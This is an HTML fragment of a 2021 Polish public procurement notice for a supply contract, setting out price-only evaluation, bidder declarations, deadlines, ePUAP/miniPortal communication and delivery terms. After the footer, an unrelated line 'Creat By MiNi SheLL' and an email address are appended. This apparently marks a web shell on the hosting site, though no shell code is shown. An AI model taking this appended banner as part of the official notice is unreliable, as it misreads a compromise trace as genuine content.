class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium 1 = najniższa zaoferowana cena / cena oferty badanej x 100 pkt. <br/>Wynik: <br/>Oferta z najwyższą liczbą punktów zostanie uznana za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów. Realizacja zamówienia zostanie powierzona wykonawcy, który uzyska najwyższą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Ofertę składa się na Formularzu ofertowym zgodnie z załącznikiem nr 1 do SWZ. <br/>2.	Oferta oraz wszystkie załączniki wymagają podpisu osoby/osób uprawnionych do reprezentowania Wykonawcy. <br/>3.	W przypadku podpisywania oferty przez osobę/y niewskazane w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwo. <br/>4.	Do oferty Wykonawca zobowiązany jest dołączyć oświadczenie o niepodleganiu wykluczeniu, w zakresie wskazanym w Rozdziale 20 SWZ (załącznik nr 2 do SWZ), w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym, a następnie zaszyfrować wraz z plikami stanowiącymi ofertę. <br/>5.	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w pkt 4), składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2.	W przypadku, o którym mowa w pkt 1), wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, załączając jednocześnie do oferty udzielone pełnomocnictwo.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia określa projekt umowy stanowiący załącznik nr 3 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-14 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-14 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-11</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> A) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <br/>1.	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/ , ePUAPu, dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz poczty elektronicznej. <br/>2.	W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami w szczególności składanie oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem dedykowanego formularza: „Formularz do komunikacji” dostępnego na ePUAP oraz udostępnionego przez miniPortal. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem sprawy. (nie dotyczy składania ofert) <br/>3.	Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email przetargi@clo.com.pl. (nie dotyczy składania ofert) <br/>4.	Dokumenty elektroniczne, składane są przez Wykonawcę za pośrednictwem „Formularza do komunikacji” jako załączniki. Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych za pomocą poczty elektronicznej, na wskazany w pkt A.3 adres email. (nie dotyczy składania ofert) <br/>5. Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu. Funkcjonalność do zaszyfrowania oferty przez Wykonawcę jest dostępna dla wykonawców na miniPortalu, w szczegółach danego postępowania. W formularzu oferty Wykonawca zobowiązany jest podać adres skrzynki ePUAP, na którym prowadzona będzie korespondencja związana z postępowaniem. <br/>B) Termin wykonania zamówienia dla Pakietów 1 - 13:<br/>12 miesięcy od daty zawarcia umowy.<br/>C) Realizacja przedmiotu umowy następować będzie według rzeczywistych potrzeb Zamawiającego, a Wykonawca nie będzie wnosił żadnych roszczeń z tego tytułu, z zastrzeżeniem, iż co najmniej 80% wartości zamówienia zostanie zrealizowana. <br/>Zamawiającemu przysługuje prawo nie zrealizowania pozostałych 20% wartości zamówienia bez podawania przyczyny, a Wykonawca nie będzie wnosił żadnych roszczeń z tego tytułu.<br/>Za zgodą Wykonawcy Zamawiający może nie zrealizować więcej niż 20% wartości zamówienia, a Wykonawca nie będzie wnosił żadnych roszczeń z tego tytułu.<br/>D) Wykonawca dostarcza zamówiony towar do magazynu Zamawiającego przy ul. Jana Pawła II 2 w Siemianowicach Śląskich.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-01 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com